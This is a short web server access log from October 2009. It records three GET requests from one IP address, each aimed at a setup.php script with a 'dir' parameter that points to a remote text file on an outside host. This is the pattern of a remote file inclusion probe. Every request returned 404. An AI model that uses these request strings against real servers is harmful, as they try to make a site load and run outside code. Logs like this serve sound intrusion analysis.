174.133.148.98 - - [16/Oct/2009:02:54:42 -0500] "GET //skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:55:00 -0500] "GET /logs/access_log.1228608000//skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [16/Oct/2009:02:55:00 -0500] "GET //skin/happycast_category_lightblack/setup.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
